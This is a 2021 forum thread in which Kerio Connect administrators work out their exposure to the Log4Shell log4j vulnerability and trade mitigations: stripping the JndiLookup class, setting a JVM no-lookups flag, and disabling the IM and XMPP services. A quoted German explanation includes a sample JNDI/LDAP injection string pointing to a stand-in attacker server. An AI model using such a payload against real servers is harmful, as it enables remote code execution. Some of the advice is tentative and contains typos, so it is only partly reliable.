GFI Software

Welcome to the GFI Software community forum! For support please open a ticket from https://support.gfi.com.

Home » GFI User Forums » Kerio Connect » CVE-2021-44228 "Log4Shell"
CVE-2021-44228 "Log4Shell" [message #150625] Sat, 11 December 2021 09:00 Go to next message
nibs is currently offline  nibs
Messages: 86
Registered: November 2007

Is there any word on whether Kerio Connect components are vulnerable to CVE-2021-44228 "Log4Shell" and if so what the mitigation is?
Re: CVE-2021-44228 "Log4Shell" [message #150626 is a reply to message #150625] Sat, 11 December 2021 10:25 Go to previous messageGo to next message
PPG is currently offline  PPG
Messages: 160
Registered: February 2010
Done some research. The Log4J bundled with KC 9.3.1P1 is version 2.5 (found in ..\MailServer\javaservices\im\lib

According to several internet sources the issue is fixed in Log4j version 2.15, so basically: yeah, it's a vulnerability!

Sources:
1. https://nakedsecurity.sophos.com/2021/12/10/log4shell-java-v ulnerability-how-to-safeguard-your-servers/
2. https://en.wikipedia.org/wiki/Log4j#Log4Shell_vulnerability

Would be interested to hear from GFI how to mitigate for as long as we have to wait for patches to address this.

[Updated on: Sat, 11 December 2021 10:27]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150627 is a reply to message #150625] Sat, 11 December 2021 13:35 Go to previous messageGo to next message
james_bray is currently offline  james_bray
Messages: 4
Registered: August 2010
It would also be good to know if there are any mitigations we can apply now, prior to a patch. For instance, disabling any services or options that might rely on the log4j library.
Re: CVE-2021-44228 "Log4Shell" [message #150628 is a reply to message #150626] Sat, 11 December 2021 16:24 Go to previous messageGo to next message
Backspin is currently offline  Backspin
Messages: 118
Registered: June 2008
Location: Amsterdam, the Netherland...
Interesting. I don't think Kerio uses Java for every service, I thought only for Full text search and IM. If you don't have these enabled, you could be safe from this.

Edit: If I understand the confusing Java naming well enough, then according to the kerio/mailserver/javaservices/jre/releases file, the version of java in at least Kerio Connect 9.2.12p1 and up is "1.8.0_222", which in Java-speak appears to be Java version 8u222.

On this page ( https://blog.qualys.com/vulnerabilities-threat-research/2021 /12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shel l) it says: "If the server has Java runtimes later than 8u121, then it is protected against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false""
But I'm not sure, since Kerio uses OpenJDK, and I don't know if the numbering is the same .




[Updated on: Sat, 11 December 2021 21:32]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150631 is a reply to message #150628] Sun, 12 December 2021 11:45 Go to previous messageGo to next message
AndreasL is currently offline  AndreasL
Messages: 105
Registered: July 2008
Location: Germany
Can I donwload a patched version and replace the 3 files (rename it) myself or have to wait for a patch from GFI?
\lib\log4j-api-2.5.jar
\lib\log4j-core-2.5.jar
\lib\log4j-slf4j-impl-2.5.jar

Is an update available soon from GFI?

[Updated on: Sun, 12 December 2021 12:06]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150632 is a reply to message #150625] Sun, 12 December 2021 18:33 Go to previous messageGo to next message
edikonfetti is currently offline  edikonfetti
Messages: 2
Registered: December 2021
I deleted the JndiLookup class from log4j-core-2.5.jar until GFI releases an update. Haven't run into any issues yet. I took a backup of the original jar file, just in case.

Run with elevated privileges:
cd /opt/kerio/mailserver/javaservices/im/lib
systemctl stop kerio-connect.service
tar -cvzf log4j-core-2.5.jar-vulnerable.gz log4j-core-2.5.jar
zip -d log4j-core-2.5.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
systemctl start kerio-connect.service
Re: CVE-2021-44228 "Log4Shell" [message #150633 is a reply to message #150631] Mon, 13 December 2021 07:01 Go to previous messageGo to next message
boisbleu is currently offline  boisbleu
Messages: 59
Registered: May 2015
I dont't think so, that you can do it this way. There a 6 years of development between version 2.5 and 2.15

The question is: can the system infected using the default communication services of the mailserver?

So far I thought, the whole system is based on Java.

[Updated on: Mon, 13 December 2021 07:14]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150634 is a reply to message #150626] Mon, 13 December 2021 07:16 Go to previous messageGo to next message
FEichelsdoerfer is currently offline  FEichelsdoerfer
Messages: 33
Registered: June 2015
Location: Germany
Hi, sorry, I did´nt get it.
When the Log4J bundled with KC 9.3.1P1 is version 2.5, and the issue is fixed with Version 2.15 (a lower version than 2.5?), why should there be a vulnerability?
Re: CVE-2021-44228 "Log4Shell" [message #150635 is a reply to message #150634] Mon, 13 December 2021 07:25 Go to previous messageGo to next message
boisbleu is currently offline  boisbleu
Messages: 59
Registered: May 2015
https://logging.apache.org/log4j/2.x/changes-report.html

And for our german speaking users:

Quote:
Das Problem entsteht, wenn ein Dienst ein Ereignis wie "Habe X getroffen" protokolliert. Im Java-Universum kommt dabei häufig die Bibliothek Log4j zum Einsatz. Und die schreibt das nicht nur weg; sie versucht, den Text X zu interpretieren. Und wenn der etwas wie

${jndi:ldap://boser.server.de/a}

enthält, dann knallt es. Der Dienst kontaktiert "boser.server.de", nimmt von diesem Java-Code entgegen und führt den aus. Ja, genau einfach so.

Quelle: https://www.heise.de/ratgeber/Schutz-vor-Log2j-Luecke-was-hi lft-jetzt-und-was-eher-nicht-6292961.html

[Updated on: Mon, 13 December 2021 07:39]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150636 is a reply to message #150635] Mon, 13 December 2021 07:29 Go to previous messageGo to next message
frankdb is currently offline  frankdb
Messages: 2
Registered: February 2021
15 is higher than 5.

On the subject of kerio, the IM service definitely includes the library and the vulnerable class. If the numbering scheme is correct, as Backspin mentioned, the java version should prevent it from being exploited. I would still disable and turn off the IM service ( XMPP )
Re: CVE-2021-44228 "Log4Shell" [message #150637 is a reply to message #150625] Mon, 13 December 2021 07:52 Go to previous messageGo to next message
tholud is currently offline  tholud
Messages: 1
Registered: December 2021
not nice not getting a patch in time for a paid service.
jitsi has fixed it already two days ago.
but anyhow.
we fixed it by changing the configuration of mailserver.

go to your mailserver config file should be something like mailserver.cfg in folder /opt/kerio/mailserver

there you find several lines beinning with:

<variable name="JvmOptions""

if you don'T have options here replace this line by:

<variable name="JvmOptions">-Dlog4j2.formatMsgNoLookups=true</variable >

So this will prevent doing Lookups.

Very Important...before changing you have to stop the server, then change the file, then start the server again.
If you are not doing this way, changes will be dissmissed automatically.


Re: CVE-2021-44228 "Log4Shell" [message #150638 is a reply to message #150635] Mon, 13 December 2021 08:01 Go to previous messageGo to next message
FEichelsdoerfer is currently offline  FEichelsdoerfer
Messages: 33
Registered: June 2015
Location: Germany
Dankeschön! Erschreckend. Etwas unglückliche Versionierung, meiner Meinung nach.
Re: CVE-2021-44228 "Log4Shell" [message #150639 is a reply to message #150638] Mon, 13 December 2021 08:14 Go to previous messageGo to next message
boisbleu is currently offline  boisbleu
Messages: 59
Registered: May 2015
Bei älteren Versionen empfehlen die Entwickler, als Mitigation die Klasse JndiLookup zu entfernen:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Am besten auf ein anderes System kopieren und dann mit einem Packer die Klasse entfernen. Alte Datei umbenennen und neue rüberkopieren. Zur Sicherheit den Dienst neustarten.

---

If using older versions than 2.10 it's recommand to remove the class IndiLookup.

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Copy the file to another system, remove the class from the archive, rename the file on the server, copy the modified file to the server and restart the service.

[Updated on: Mon, 13 December 2021 08:19]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150640 is a reply to message #150639] Mon, 13 December 2021 09:20 Go to previous messageGo to next message
AndreasL is currently offline  AndreasL
Messages: 105
Registered: July 2008
Location: Germany
what happen if I delete/rename the 4 .jar files?
Re: CVE-2021-44228 "Log4Shell" [message #150641 is a reply to message #150640] Mon, 13 December 2021 09:35 Go to previous messageGo to previous message
atgfi is currently offline  atgfi
Messages: 1
Registered: December 2021
Hello,

you can try what opens log4j with following command on Linux:

lsof | grep log4j

next you try is:

ps auxxwww | greo java

You see its IM and XMPP.

Disable XMPP in webadmin tool off kerio connect.

restart kerio-connect

try again lsof | grep log4j

im is allways activ.

stop kerio-connect

change following settings in mailserver.cfg from 1 to 0:


<table name="InstantMessaging">
...
<variable name="Enabled">0</variable>
...
</table>

<table name="WebIM">
...
<variable name="Enabled">0</variable>
...
</table>


restart kerio-connect

test with lsof | grep log4j and ps -auxwww | grep java

there should no mor Java processes and maybe i think you are now safe.

sorry fro quick and dirty english but i#m really busy about log4j at this time.
Previous Topic: Errors in Kerio Connect 9.3.1p2
Next Topic: GFI. Stop that!
Goto Forum:
  


Current Time: Sat Jul 02 21:37:50 CEST 2022

Total time taken to generate the page: 0.06311 seconds